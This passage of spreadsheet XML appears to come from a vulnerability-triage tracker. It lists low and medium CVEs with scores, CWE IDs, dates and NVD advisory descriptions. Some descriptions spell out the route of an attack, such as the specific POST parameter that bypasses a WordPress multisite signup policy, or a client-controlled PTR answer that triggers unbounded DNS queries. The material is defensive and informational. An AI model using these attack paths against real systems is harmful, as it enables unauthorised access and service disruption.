r="B2270" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2270" s="5" t="inlineStr"><is><t>CVE-2026-82309</t></is></c><c r="D2270" s="5" t="n"><v>4.3</v></c><c r="E2270" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2270" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2270" s="5" t="inlineStr" /><c r="H2270" s="5" t="n"><v>0.002</v></c><c r="I2270" s="5" t="inlineStr" /><c r="J2270" s="5" t="inlineStr" /><c r="K2270" s="5" t="inlineStr" /><c r="L2270" s="5" t="inlineStr" /><c r="M2270" s="5" t="inlineStr" /><c r="N2270" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2270" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2270" s="5" t="inlineStr" /><c r="Q2270" s="5" t="inlineStr"><is><t>CWE-405, CWE-770</t></is></c><c r="R2270" s="5" t="inlineStr"><is><t>Robots::Validate versions from 0.3.2 before 0.3.11 for Perl allow unbounded outbound DNS queries per validation via a forward-confirmation loop that does not bound the names it queries.

_check_dns issues one PTR query for the client address, keeps the returned names matching the rule's domain, and issues a forward query for each until one resolves back to that address. Nothing bounds that list, and a client controls the reverse zone for its own address, so it chooses how many names the PTR answer holds. Net::DNS refetches a truncated answer over TCP by default, so the 512-byte UDP payload does not cap it either.

Any client whose User-Agent matches a rule with a domain reaches _check_dns. Each forward name is distinct and client-chosen, so every query misses the local cache and is resolved against the authoritative servers for that domain. The queries are synchronous, so the caller is held until all of them answer or time out.</t></is></c><c r="S2270" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82309</t></is></c></row><row r="2271"><c r="A2271" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2271" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2271" s="5" t="inlineStr"><is><t>CVE-2026-83628</t></is></c><c r="D2271" s="5" t="n"><v>4.3</v></c><c r="E2271" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2271" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G2271" s="5" t="inlineStr" /><c r="H2271" s="5" t="n"><v>0.002</v></c><c r="I2271" s="5" t="inlineStr" /><c r="J2271" s="5" t="inlineStr" /><c r="K2271" s="5" t="inlineStr" /><c r="L2271" s="5" t="inlineStr" /><c r="M2271" s="5" t="inlineStr" /><c r="N2271" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2271" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2271" s="5" t="inlineStr" /><c r="Q2271" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2271" s="5" t="inlineStr"><is><t>The Theme My Login plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 7.1.15 on Multisite installations. This is due to the `tml_ms_signup_handler()` function's `gimmeanotherblog` branch failing to enforce the network's `active_signup` registration policy, checking only `is_user_logged_in()` while sibling branches such as `validate-blog-signup` apply the full policy gate. This makes it possible for authenticated attackers, with Subscriber-level access and above, to directly POST `stage=gimmeanotherblog` to Theme My Login's signup route, bypassing the configured registration policy entirely — even when it is set to `none` or `user` — which causes `wpmu_create_blog()` to execute with the attacker's user ID, after which WordPress core assigns the Administrator role on the newly created subsite via `add_user_to_blog()`. The privilege gain is scoped to the newly created subsite only; the attacker's account retains Subscriber-level access on the main site and does not obtain Super Admin or network-level capabilities such as `manage_network` or `manage_sites`.</t></is></c><c r="S2271" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83628</t></is></c></row><row r="2272"><c r="A2272" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2272" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2272" s="5" t="inlineStr"><is><t>CVE-2026-86176</t></is></c><c r="D2272" s="5" t="n"><v>4.3</v></c><c r="E2272" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2272" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2272" s="5" t="inlineStr" /><c r="H2272" s="5" t="n"><v>0.002</v></c><c r="I2272" s="5" t="inlineStr" /><c r="J2272" s="5" t="inlineStr" /><c r="K2272" s="5" t="inlineStr" /><c r="L2272" s="5" t="inlineStr" /><c r="M2272" s="5" t="inlineStr" /><c r="N2272" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2272" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2272" s="5" t="inlineStr" /><c r="Q2272" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R2272" s="5" t="inlineStr"><is><t>NetBox through 4.7.0 fails to properly scope user-private records in REST and GraphQL API endpoints for Notifications, Subscriptions, and Bookmarks. Authenticated users with view permissions can access all users' private records through unscoped querysets, disclosing which users watch or bookmark which objects.</t></is></c><c r="S2272" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86176</t></is></c></row><row r="2273"><c r="A2273" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2273" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2273" s="5" t="inlineStr"><is><t>CVE-2026-86736</t></is></c><c r="D2273" s="5" t="n"><v>4.3</v></c><c r="E2273" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2273" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2273" s="5" t="inlineStr" /><c r="H2273" s="5" t="n"><v>0.002</v></c><c r="I2273" s="5" t="inlineStr" /><c r="J2273" s="5" t="inlineStr" /><c r="K2273" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L2273" s="5" t="inlineStr" /><c r="M2273" s="5" t="inlineStr" /><c r="N2273" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2273" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2273" s="5" t="inlineStr" /><c r="Q2273" s="5" t="inlineStr"><is><t>CWE-682</t></is></c><c r="R2273" s="5" t="inlineStr"><is><t>snipe-it before 8.7.0 contains an incorrect calculation vulnerability in checkout request handling that allows authenticated users to corrupt the assets.requests_counter through duplicate submissions and cancellations without active requests. Attackers can repeatedly call cancel endpoints without active requests to drive the counter negative, or submit duplicate checkout requests to inflate the counter, misrepresenting pending demand in the admin queue.</t></is></c><c r="S2273" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86736</t></is></c></row><row r="2274"><c r="A2274" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2274" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2274" s="5" t="inlineStr"><is><t>CVE-2026-86853</t></is></c><c r="D2274" s="5" t="n"><v>4.3</v></c><c r="E2274" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2274" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2274" s="5" t="inlineStr" /><c r="H2274" s="5" t="n"><v>0.002</v></c><c r="I2274" s="5" t="inlineStr" /><c r="J2274" s="5" t="inlineStr" /><c r="K2274" s="5" t="inlineStr" /><c r="L2274" s="5" t="inlineStr" /><c r="M2274" s="5" t="inlineStr" /><c r="N2274" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2274" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2274" s="5" t="inlineStr" /><c r="Q2274" s="5" t="inlineStr"><is><t>CWE-451</t></is></c><c r="R2274" s="5" t="inlineStr"><is><t>A malicious webpage could repeatedly trigger external URL schemes, causing system prompts or external application launches. This could make Firefox for iOS temporarily unusable until the page is closed. This vulnerability was fixed in Firefox for iOS 155.1.</t></is></c><c r="S2274" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86853</t></is></c></row><row r="2275"><c r="A2275" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2275" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2275" s="5" t="inlineStr"><is><t>CVE-2026-86994</t></is></c><c r="D2275" s="5" t="n"><v>4.3</v></c><c r="E2275" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2275" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2275" s="5" t="inlineStr" /><c r="H2275" s="5" t="n"><v>0.002</v></c><c r="I2275" s="5" t="inlineStr" /><c r="J2275" s="5" t="inlineStr" /><c r="K2275" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L2275" s="5" t="inlineStr" /><c r="M2275" s="5" t="inlineStr" /><c r="N2275" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2275" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2275" s="5" t="inlineStr" /><c r="Q2275" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2275" s="5" t="inlineStr"><is><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is></c><c r="S2275" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86994</t></is></c></row><row r="2276"><c r="A2276" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2276" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2276" s="5" t="inlineStr"><is><t>CVE-2026-86995</t></is></c><c r="D2276" s="5" t="n"><v>4.3</v></c><c r="E2276" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2276" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2276" s="5" t="inlineStr" /><c r="H2276" s="5" t="n"><v>0.003</v></c><c r="I2276" s="5" t="inlineStr" /><c r="J2276" s="5" t="inlineStr" /><c r="K2276" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L2276" s="5" t="inlineStr" /><c r="M2276" s="5" t="inlineStr" /><c r="N2276" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2276" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2276" s="5" t="inlineStr" /><c r="Q2276" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="R2276" s="5" t="inlineStr"><is><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is></c><c r="S2276" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86995</t></is></c></row><row r="2277"><c r="A2277" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2277" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2277" s="5" t="inlineStr"><is><t>CVE-2026-9033</t></is></c><c r="D2277" s="5" t="n"><v>4.3</v></c><c r="E2277" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2277" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2277" s="5" t="inlineStr" /><c r="H2277" s="5" t="n"><v>0.002</v></c><c r="I2277" s="5" t="inlineStr" /><c r="J2277" s="5" t="inlineStr" /><c r="K2277" s="5" t="inlineStr"><is><t>tp-link:dr3150, tp-link:dr3150_firmware, tp-link:dr3220v-4g, tp-link:dr3220v-4g_firmware, tp-link:dr3650v, tp-link:dr3650v-4g, tp-link:dr3650v-4g_firmware, tp-link:dr3650v_firmware, tp-link:er603wp-4g-outdoor, tp-link:er603wp-4g-outdoor_firmware</t></is></c><c r="L2277" s="5" t="inlineStr" /><c r="M2277" s="5" t="inlineStr" /><c r="N2277" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2277" s="5" t="inlineStr"><is><t>2026-08-20</t></is></c><c r="P2277" s="5" t="inlineStr" /><c r="Q2277" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R2277" s="5" t="inlineStr"><is><t>An unauthenticated attacker with network access to the captive portal service of an affected device can terminate active captive portal sessions, including forcing logout of specific users or clearing all active sessions. Affected users must re-authenticate to regain access. 



Successful exploitation may allow termination of individual or all active captive portal sessions, causing temporary service disruption and requiring users to re-authenticate.</t></is></c><c r="S2277" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9033</t></is></c></row><row r="2278"><c r="A2278" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2278" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2278" s="5" t="inlineStr"><is><t>CVE-2026-16647</t></is></c><c r="D2278" s="5" t="n"><v>4.1</v></c><c r="E2278" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2278" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2278" s="5" t="inlineStr" /><c r="H2278" s="5" t="n"><v>0.003</v></c><c r="I2278" s="5" t="inlineStr" /><c r="J2278" s="5" t="inlineStr" /><c r="K2278" s="5" t="inlineStr"><is><t>zyxware:disable_login_page</t></is></c><c r="L2278" s="5" t="inlineStr" /><c r="M2278" s="5" t="inlineStr" /><c r="N2278" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2278" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P2278" s="5" t="inlineStr" /><c r="Q2278" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="R2278" s="5" t="inlineStr"><is><t>Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Disable Login Page allows Functionality Bypass. This issue affects Disable Login Page versions: from 0.0.0 to 1.1.4.</t></is></c><c r="S2278" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16647</t></is></c></row><row r="2279"><c r="A2279" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2279" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2279" s="5" t="inlineStr"><is><t>CVE-2026-82186</t></is></c><c r="D2279" s="5" t="n"><v>4.1</v></c><c r="E2279" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2279" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2279" s="5" t="inlineStr" /><c r="H2279" s="5" t="n"><v>0.002</v></c><c r="I2279" s="5" t="inlineStr" /><c r="J2279" s="5" t="inlineStr" /><c r="K2279" s="5" t="inlineStr" /><c r="L2279" s="5" t="inlineStr" /><c r="M2279" s="5" t="inlineStr" /><c r="N2279" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2279" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2279" s="5" t="inlineStr" /><c r="Q2279" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R2279" s="5" t="inlineStr"><is><t>The WPLP Cookie Consent  WordPress plugin before 4.4.2 does not properly validate a pagination parameter before using it in a SQL query, allowing users with administrator privileges to perform SQL injection attacks.</t></is></c><c r="S2279" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82186</t></is></c></row><row r="2280"><c r="A2280" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2280" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2280" s="5" t="inlineStr"><is><t>CVE-2026-83543</t></is></c><c r="D2280" s="5" t="n"><v>4.1</v></c><c r="E2280" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2280" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2280" s="5" t="inlineStr" /><c r="H2280" s="5" t="n"><v>0.002</v></c><c r="I2280" s="5" t="inlineStr" /><c r="J2280" s="5" t="inlineStr" /><c r="K2280" s="5" t="inlineStr" /><c r="L2280" s="5" t="inlineStr" /><c r="M2280" s="5" t="inlineStr" /><c r="N2280" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2280" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2280" s="5" t="inlineStr" /><c r="Q2280" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R2280" s="5" t="inlineStr"><is><t>The Greenshift  WordPress plugin before 13.2.0 does not validate a user-supplied URL before fetching it server-side, allowing users with contributor-level access and above to make the server issue requests to arbitrary hosts and read the response.</t></is></c><c r="S2280" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83543</t></is></c></row><row r="2281"><c r="A2281" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2281" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2281" s="5" t="inlineStr"><is><t>CVE-2026-12285</t></is></c><c r="D2281" s="5" t="n"><v>4</v></c><c r="E2281" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2281" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2281" s="5" t="inlineStr" /><c r="H2281" s="5" t="n"><v>0.001</v></c><c r="I2281" s="5" t="inlineStr" /><c r="J2281" s="5" t="inlineStr" /><c r="K2281" s="5" t="inlineStr" /><c r="L2281" s="5" t="inlineStr" /><c r="M2281" s="5" t="inlineStr" /><c r="N2281" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2281" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2281" s="5" t="inlineStr" /><c r="Q2281" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R2281" s="5" t="inlineStr"><is><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is></c><c r="S2281" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12285</t></is></c></row><row r="2282"><c r="A2282" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2282" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2282" s="5" t="inlineStr"><is><t>CVE-2026-75421</t></is></c><c r="D2282" s="5" t="n"><v>4</v></c><c r="E2282" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2282" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2282" s="5" t="inlineStr" /><c r="H2282" s="5" t="n"><v>0.001</v></c><c r="I2282" s="5" t="inlineStr" /><c r="J2282" s="5" t="inlineStr" /><c r="K2282" s="5" t="inlineStr" /><c r="L2282" s="5" t="inlineStr" /><c r="M2282" s="5" t="inlineStr" /><c r="N2282" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2282" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P2282" s="5" t="inlineStr" /><c r="Q2282" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R2282" s="5" t="inlineStr"><is><t>aria2 &lt;=1.37.0 has a stack-buffer-underflow vulnerability in the IOFile::getLine() function.</t></is></c><c r="S2282" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75421</t></is></c></row><row r="2283"><c r="A2283" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2283" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2283" s="5" t="inlineStr"><is><t>CVE-2026-80159</t></is></c><c r="D2283" s="5" t="n"><v>4</v></c><c r="E2283" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2283" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2283" s="5" t="inlineStr" /><c r="H2283" s="5" t="n"><v>0.001</v></c><c r="I2283" s="5" t="inlineStr" /><c r="J2283" s="5" t="inlineStr" /><c r="K2283" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L2283" s="5" t="inlineStr" /><c r="M2283" s="5" t="inlineStr" /><c r="N2283" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2283" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2283" s="5" t="inlineStr" /><c r="Q2283" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="R2283" s="5" t="inlineStr"><is><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is></c><c r="S2283" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80159</t></is></c></row><row r="2284"><c r="A2284" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2284" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2284" s="5" t="inlineStr"><is><t>CVE-2026-55785</t></is></c><c r="D2284" s="5" t="n"><v>3.7</v></c><c r="E2284" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2284" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2284" s="5" t="inlineStr" /><c r="H2284" s="5" t="n"><v>0.003</v></c><c r="I2284" s="5" t="inlineStr" /><c r="J2284" s="5" t="inlineStr" /><c r="K2284" s="5" t="inlineStr" /><c r="L2284" s="5" t="inlineStr" /><c r="M2284" s="5" t="inlineStr" /><c r="N2284" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2284" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P2284" s="5" t="inlineStr" /><c r="Q2284" s="5" t="inlineStr"><is><t>CWE-208, CWE-385, CWE-532</t></is></c><c r="R2284" s="5" t="inlineStr"><is><t>free5GC is an open-source implementation of the 5G core network. Prior to 1.4.5, the AUSF component performs cryptographic authentication comparisons in internal/sbi/processor/ue_authentication.go with ordinary equality helpers. Auth5gAkaComfirmRequestProcedure compares RES* and XRES* with strings.EqualFold and logs the expected XRES* value at INFO level before comparison. EapAuthComfirmRequestProcedure compares AT_MAC and XMAC with bytes.Equal and evaluates XRES == RES with ordinary string equality. These comparisons can return at mismatch-dependent times, although testing did not demonstrate a practical remote timing oracle because of HTTP/SBI timing noise. The INFO log exposes authentication material to operators, log collectors, sidecars, or processes able to read AUSF logs. This issue is fixed in version 1.4.5.</t></is></c><c r="S2284" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55785</t></is></c></row><row r="2285"><c r="A2285" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2285" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2285" s="5" t="inlineStr"><is><t>CVE-2026-81348</t></is></c><c r="D2285" s="5" t="n"><v>3.7</v></c><c r="E2285" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2285" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2285" s="5" t="inlineStr" /><c r="H2285" s="5" t="n"><v>0.002</v></c><c r="I2285" s="5" t="inlineStr" /><c r="J2285" s="5" t="inlineStr" /><c r="K2285" s="5" t="inlineStr" /><c r="L2285" s="5" t="inlineStr" /><c r="M2285" s="5" t="inlineStr" /><c r="N2285" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2285" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2285" s="5" t="inlineStr" /><c r="Q2285" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R2285" s="5" t="inlineStr"><is><t>The My Private Site  WordPress plugin before 4.2.3 does not apply its site-privacy access control to certain unauthenticated front-end read surfaces, allowing unauthenticated users to view post content, comments and post URLs from a site the administrator placed behind mandatory login.</t></is></c><c r="S2285" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81348</t></is></c></row><row r="2286"><c r="A2286" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2286" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2286" s="5" t="inlineStr"><is><t>CVE-2025-15694</t></is></c><c r="D2286" s="5" t="n"><v>3.5</v></c><c r="E2286" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2286" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2286" s="5" t="inlineStr" /><c r="H2286" s="5" t="n"><v>0.002</v></c><c r="I2286" s="5" t="inlineStr" /><c r="J2286" s="5" t="inlineStr" /><c r="K2286" s="5" t="inlineStr" /><c r="L2286" s="5" t="inlineStr" /><c r="M2286" s="5" t="inlineStr" /><c r="N2286" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2286" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2286" s="5" t="inlineStr" /><c r="Q2286" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2286" s="5" t="inlineStr"><is><t>The Joli Table Of Contents WordPress plugin before 2.8.1 does not sanitise and escape some of its settings before outputting them in an admin page, which could allow high-privilege users such as administrators to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed, for example in a multisite setup.</t></is></c><c r="S2286" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-15694</t></is></c></row><row r="2287"><c r="A2287" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2287" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2287" s="5" t="inlineStr"><is><t>CVE-2026-49895</t></is></c><c r="D2287" s="5" t="n"><v>3.5</v></c><c r="E2287" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2287" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2287" s="5" t="inlineStr" /><c r="H2287" s="5" t="n"><v>0.001</v></c><c r="I2287" s="5" t="inlineStr" /><c r="J2287" s="5" t="inlineStr" /><c r="K2287" s="5" t="inlineStr" /><c r="L2287" s="5" t="inlineStr" /><c r="M2287" s="5" t="inlineStr" /><c r="N2287" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2287" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2287" s="5" t="inlineStr" /><c r="Q2287" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="R2287" s="5" t="inlineStr"><is><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is></c><c r="S2287" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49895</t></is></c></row><row r="2288"><c r="A2288" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2288" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2288" s="5" t="inlineStr"><is><t>CVE-2026-69904</t></is></c><c r="D2288" s="5" t="n"><v>3.5</v></c><c r="E2288" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2288" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2288" s="5" t="inlineStr" /><c r="H2288" s="5" t="n"><v>0.006</v></c><c r="I2288" s="5" t="inlineStr" /><c r="J2288" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K2288" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L2288" s="5" t="inlineStr" /><c r="M2288" s="5" t="inlineStr" /><c r="N2288" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2288" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2288" s="5" t="inlineStr" /><c r="Q2288" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R2288" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="S2288" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69904</t></is></c></row><row r="2289"><c r="A2289" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2289" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2289" s="5" t="inlineStr"><is><t>CVE-2026-75726</t></is></c><c r="D2289" s="5" t="n"><v>3.5</v></c><c r="E2289" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2289" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2289" s="5" t="inlineStr" /><c r="H2289" s="5" t="n"><v>0.004</v></c><c r="I2289" s="5" t="inlineStr" /><c r="J2289" s="5" t="inlineStr" /><c r="K2289" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2289" s="5" t="inlineStr" /><c r="M2289" s="5" t="inlineStr" /><c r="N2289" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2289" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2289" s="5" t="inlineStr" /><c r="Q2289" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R2289" s="5" t="inlineStr"><is><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is></c><c r="S2289" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75726</t></is></c></row><row r="2290"><c r="A2290" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2290" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2290" s="5" t="inlineStr"><is><t>CVE-2026-76960</t></is></c><c r="D2290" s="5" t="n"><v>3.5</v></c><c r="E2290" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2290" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G2290" s="5" t="inlineStr" /><c r="H2290" s="5" t="n"><v>0.001</v></c><c r="I2290" s="5" t="inlineStr" /><c r="J2290" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K2290" s="5" t="inlineStr" /><c r="L2290" s="5" t="inlineStr" /><c r="M2290" s="5" t="inlineStr" /><c r="N2290" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2290" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2290" s="5" t="inlineStr" /><c r="Q2290" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="R2290"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S2290" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76960</t></is></c></row><row r="2291"><c r="A2291" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2291" s="5" 